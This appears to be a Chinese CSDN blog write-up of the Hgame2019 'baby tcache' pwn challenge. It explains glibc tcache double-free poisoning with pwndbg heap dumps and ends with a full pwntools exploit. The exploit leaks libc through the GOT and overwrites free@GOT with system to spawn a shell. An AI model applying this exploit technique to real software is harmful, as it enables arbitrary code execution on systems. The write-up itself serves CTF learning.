Hgame2019_baby tcache

最新推荐文章于 2024-04-15 06:50:57 发布
最新推荐文章于 2024-04-15 06:50:57 发布
阅读量3.9k 收藏
点赞数 2
分类专栏: CTF Pwn
钞sir
本文链接:https://blog.csdn.net/qq_40827990/article/details/88059895
版权
Pwn 同时被 3 个专栏收录
28 篇文章 8 订阅
订阅专栏
CTF
22 篇文章 4 订阅
订阅专栏
6 篇文章 1 订阅
订阅专栏

简介

Tcache机制应该是从2.26之后版本的libc中才加进去的,而这个机制可能使我们的攻击变得更加简单,因为我们可能不需要去构造false_chunk,只需要覆盖tcache中的next,即将tcache中的next覆盖为我们自己的地址,从而达到任意地址写入;
简单地来讲,Tcache机制就是增加一个bin缓存,而且每个bin是单链表结构,单个tcache bin默认最多包含7个块;在释放chunk时,_int_free中在检查了size合法后,放入fastbin之前,它先尝试将其放入tcache;而在__libc_malloc,_int_malloc之前,如果tcache中存在满足申请需求大小的块,就从对应的tcache中返回chunk;
最关键的是,因为没有任何检查,所以我们可以对同一个chunk连续多次free,造成cycliced list(想一下double_free的操作,有点相像的感觉);
而这个babytcache这道题,就是主要利用这个思想;

Tcachebins

我们先看一下Tcachebins到底是什么样的,我们就以这道题来看,并且演示一下覆盖tcache中的next;
我们先申请1个chunks,即先添加一个note:

pwndbg> heap
0x603000 PREV_INUSE {
  mchunk_prev_size = 0, 
  mchunk_size = 593, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x603250 FASTBIN {          #add_note
  mchunk_prev_size = 0, 
  mchunk_size = 97, 
  fd = 0x6161616161, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}
0x6032b0 PREV_INUSE {
  mchunk_prev_size = 0, 
  mchunk_size = 134481, 
  fd = 0x0, 
  bk = 0x0, 
  fd_nextsize = 0x0, 
  bk_nextsize = 0x0
}

然后连续释放2次,即delete我们添加的note两次;
此时的tcachebins是这个样子:

pwndbg> bins
tcachebins
0x60 [  2]: 0x603260 ◂— 0x603260 /* '`2`' */
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

接下来的操作可以想一下double_free,我们先申请一个chunk,然后输入我们需要修改的地址空间(这里假设是0x603460,并且写入’/bin/sh’);
此时我们再看一下tcachebins:

pwndbg> bins
tcachebins
0x60 [  1]: 0x603260 —▸ 0x603460 ◂— 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

我们看到0x603460似乎被我们添加到了tcache中的next,只需要我们在malloc两次就可以拿到0x603460地址空间了;
我们再次连续添加2个note看看;

pwndbg> x/4gx 0x603460
0x603460:	0x0068732f6e69622f	0x0000000000000000
0x603470:	0x0000000000000000	0x0000000000000000

0x603460的位置确实被我们修改了;
但是我们现在来看看tcachebins:

pwndbg> bins
tcachebins
0x60 [ -1]: 0x0
fastbins
0x20: 0x0
0x30: 0x0
0x40: 0x0
0x50: 0x0
0x60: 0x0
0x70: 0x0
0x80: 0x0
unsortedbin
all: 0x0
smallbins
empty
largebins
empty

tcachebins确实为空了,但是我们发现tc_idx变成了-1;这就导致我们接下来不可以在使用tcachebins了,否则程序可能报错:

>2
index:3
free(): invalid pointer

这个就是我们需要注意的地方,所以要避免这个问题,我们最开始就一个free()三次,而不是两次;

思路

这道题的思路其实就是想办法泄露出system函数的地址,然后想办法改got表,最后getshell;
这道题有一个关键点是,程序将我们申请的chunk的地址放在了0x6020e0这个地址开始的位置,当我们show note的时候就是从这个地方读取指针,然后打印出内容;
所以我们利用cycliced list的思想将0x6020e0位置的指针改为free的got表的指针,然后就可以泄露free函数的在libc的地址,计算出system函数的地址;然后用同样的方法将free的got表覆盖为system函数的地址;最后调用free()函数就可以getshell了;

EXP

from pwn import *
p = process('./tcache')
elf = ELF('./tcache')
#context.log_level = 'debug'
#context.terminal = ['deepin-terminal', '-x', 'p' ,'-c']
if args.G:
    gdb.attach(p)
    
def add(s):
    p.recvuntil('>')
    p.sendline('1')
    p.recvuntil('content:')
    p.sendline(s)

def delete(i):
    p.recvuntil('>')
    p.sendline('2')
    p.recvuntil('index:')
    p.sendline('%d'%i)
    
def show(i):
    p.recvuntil('>')
    p.sendline('3')
    p.recvuntil('index:')
    p.sendline('%d'%i)

add('a'*8)
delete(0)
delete(0)
delete(0)
n = 1 # 1<=n<=3
add(p64(0x6020e0 + 0x8*n)) #这里至少偏移0x8是tc_idx的原因
add('/bin/sh')
add(p64(elf.got['free']))
show(n)

free_addr = (u64(p.recv(8)))%0x1000000000000
lib_addr = free_addr - 0x82ba0
system_addr = lib_addr + 0x42510
print "free_addr: " + hex(free_addr)
print "system_addr: " + hex(system_addr)

p.sendline('2')
p.recvuntil('index:')
p.sendline('0')
delete(0)
delete(0)
add(p64(elf.got['free']))
add('/bin/sh')
add(p64(system_addr))

delete(0)
p.interactive()

总结

如果这道题有system(’/sh’)函数的,直接利用double_free就可以了,因为不在需要Tcache;
因为单个tcache bin默认最多包含7个块,所以在unlink操作时,可能首先得先把tcache填满;
利用tcache使我们对某些堆的利用变得更加简单了,不过在使用的过程中要想清楚它的分配情况,结合具体的程序分析,可能会有一些取巧的地方

钞sir
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
hgame:Haskell 游戏引擎
05-30
游戏 Haskell 游戏引擎
HGAME cdcollector-开源
04-24
这是现有项目cdcollector的mod,用于为拥有过多数据库的人使用phpmysql存储您的HGAMES数据库。
我对HGAME的看法(GalGame)
大师的资源
02-15 9264
堕落了,居然下载18禁的GalGame顺便谈谈我对 HGAME的看法HGAME,我也局限于studio e go的游戏更准确地说是18禁的GalGame(美少女游戏)看看网上:切随便找个 GAL 游戏美女都多的要不成 GAL全是H的 日本游戏没H的少死了 在日本大家都玩PS PC游戏市场都被H的占领了 所以PC游戏就是HGAME 想玩HGAME 就说嘛(http://zhidao.baid
HGAME 2024 WEEK2 Web方向题解 全_what the cow say (2)
最新发布
2301_76223496的博客
04-15 930
可参考的弱密码字典:https://github.com/TheKingOfDuck/fuzzDicts/blob/master/passwordDict/top1000.txt。真能搜到,Go的SSTI危害比较小,能用的基本上只有XSS。请本地打通再尝试远程环境;感觉好像SSTI,又说flag在bot手上,怀疑是XSS。我之前生成pickle那个引用了os包,可能环境没有,换个脚本。函数,无需重复创建)(反弹shell失败了,尝试DNS带出flag)注意,pickle,版本要一致,版本是311。
hgame是什么?【详解】 【我们不能光玩game,而不了解game的文化】
FreeXploiT
05-15 1万+
allyesno:今天偶闻hgame资深人士swan对hgame的言论 [12:23] 最开始的那种游戏,出现图片的时候你要按h键才能往下显示[12:24] 后来就用h-game代替了[12:24] 然后发展到hentai[12:24] 这个是日文变态的意思~嘿嘿,不过是现有h才有hentai的下面我们来看看一篇更详细的说明 希望对大家以后提高玩hgame的水平有帮助H-gam
本世纪最经典好文---新系统下经典老游戏[中文HGAME]重玩全攻略(感谢作者)
lanji1988的专栏
04-10 2万+
送给所有爱玩游戏的老鸟们 老游戏中有大量经典作品,其中中文的HGAME更是经典中的经典! ◆ 告别的年代 失色的回忆?——新系统下经典老游戏重玩全攻略 ◆  “新”与“老”当然是相对的,不过在开篇之前有必要确定我们的讨论范畴,这里的“老”是指为Win98之前的操作系统,包括DOS和Win32/95,而新系统则是指Win98/2000/XP。毫无疑问,有很多老游戏都很值得我们来重温,但重
HGAME2021 - 梦的开始
anwen12的博客
03-01 2157
HGAME2021 - 梦的开始 WEB 0x01 200OK! 参考链接:https://blog.csdn.net/anwen12/article/details/113728065 0x02 LazyDogR4U 一个简单的代码审计类的问题 这是提示 这里请不要像沙雕的博主一样,将简单的替换为空,理解为需要找寻其他的系统变量,因为所有的变量都已经被制空了。至于需要一个已经登陆的账号,0e的MD5绕过大可不必再说。 0x03 LIKI的生日礼物 题目的初步探索,没有注入,没有购买逻辑漏洞,有的只有竞
vm虚拟机-简单题目(hgame-week4-easyvm、cg-ctf wxyVM1/2
01-08
然后先写了前面的cg-ctf的两个题目,其实当时做的时候还没太大虚拟机的感觉,后面接触到hgame的题目,然后再看的时候就感觉到有些那个意思,但是两个题目是基础题目也就不是太难为人,看成数据处理的考点也做的出来...
0hgame:用0h制作的游戏->阅读README
05-01
0h游戏卡纸我在2014年10月26日凌晨02:00开始了这个项目,并在2014年10月26日凌晨02:00完成了该项目。 没有时间的游戏? 是的! 好好享受! (对于那些谁是它asceptical, ) 规则: 1- No one talk about fight club...
EroCoolSpider:EroCool漫画图集网站爬虫
03-12
EroCoolSpider 爬虫 支持列表页爬取和详情页爬取 所有爬取的图集将位于Gallery文件夹下的对应名称的文件夹内, meta.json中保存的是图集的元信息,如标签,图片数,图片源链接等 支持链接输入或通过启动参数预设...
HGAME 2023 Week1
ph0ebus的博客
01-13 2080
Week1的大多数题对我这样的萌新还是很友好的,虽然但是还是很多没解出来,不过还是学到了蛮多东西,浅浅记录一下。
Linux下gdb(插件pwndbg、pead、gef)安装及调试常用指令
山高路远
04-12 9759
gdb 一、安装指令 先装,因为这个带有 parseheap、以及 heapinfo 等指令,有的场景下更好用 cd ~/ git clone https://github.com/scwuaptx/Pwngdb.git cp ~/Pwngdb/.gdbinit ~/ pwndbg:pwndbg (/poʊnddb æg/)是一个GDB插件,使GDB的调试不那么糟糕,重点关注低级软件开发人员、硬件黑客、逆向工程师和开发人员需要的特性 peda:GDB的Python开发协助 gef:GEF(发音为ʤɛf
CTF-RE-わかります(hgame2018)
SuperGate的博客
01-27 2165
Hgame week1里面应该说是最难的一个题。 主函数点进去之后会发现一个函数来判断输入的是不是flag。点进去内容如下: 发现ptr数组存的是输入字符串转化为ascii码之后每个字符的前4位,v7则是后4位,这里的位是二进制位。 然后分别将两个dword_6021xx数组找出来,点进生成v8v9的函数就可以把flag对应的每个字符的高低位算出来了。 其中v9生成函数比较容易求出v9,v...
hgame2023-week3
247533的博客
02-01 830
过年 打麻将 摆烂。
Hgame
忙碌者的博客
02-06 5174
Hgame WEEK1 1.换头大作战 题目地址 题目首先是这样一个界面,既然让我提交,那自然要提交试试,随便填个1进去提交试试。 提交完提示: request method is error.I think POST is better 既然让我POST,果断调出HACKBAR,同时注意到url后面多了个want变量,自然想到去POST这个want。 构造want=1,RUN,得到下图:需要lo...
HGAME2019 WEB happyPHP
stepone4ward的博客
03-01 1253
虽然比赛已经结束了,但是不会的题目还是要及时学习的,题目直接给出了提示是使用Laravel框架进行编写的,刚开始接触这道题目的时候,一直在百度Laravel框架的漏洞,甚至没有去尝试用户注册和登陆也就没有得到源码了。。。 f12查看元素 得到作者在github上留下的源码,在SessionsController.php中得到关键的注入语句 尝试在登陆界面进行注入获取admin的邮箱,paylo...
[pwn]调试:gdb+pwndbg食用指南
热门推荐
Breeze的博客
12-31 4万+
gdb+pwndbg组合拳 文章目录gdb+pwndbg组合拳前言及安装基本指令执行指令断点指令下普通断点指令b(break):删除、禁用断点:内存断点指令watch:捕获断点catch:打印指令查看内存指令x:打印指令p(print):打印汇编指令disass(disassemble):打印源代码指令list:修改和查找指令修改数据指令set:查找数据:堆操作指令(pwndbg插件独有)其他pw...
HGAME2021-week1-wp
qq_50438521的博客
02-07 5347
HGAME2021-week1-wp 1. Web_watermelon 链接:http://watermelon.ryen.xyz:800/ 本题是一个合成大西瓜的小游戏,过2000分拿到flag。 打开这个界面我人都是懵的,这是啥??下面的堆积的界面完全看不到,然后我就瞎子摸象,玩了不下五次,没有一次超过300分。真的!!!作为一个游戏黑洞,加上我从来没玩过它,让我不作弊是不可能的。 所以在火狐浏览器中找到web开发者,在查看器中更改界面,把红线提高,要让红线高就要让界面窄一点,深一点。 (如图所示)
HGAME-week2-web-wp
静仙的博客
02-18 3354
web萌新的ctf之旅
请你完善上面的代码 添加从E:\Desktop\2024hgame\week1\crypto\奇怪的图片\png_out文件夹里面获取图片的功能
02-04
以下是完善代码的示例,添加...folder_path = "E:/Desktop/2024hgame/week1/crypto/奇怪的图片/png_out" # 获取文件夹中的图片 images = get_images_from_folder(folder_path) # 在代码中使用获取到的图片 # ... ```

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值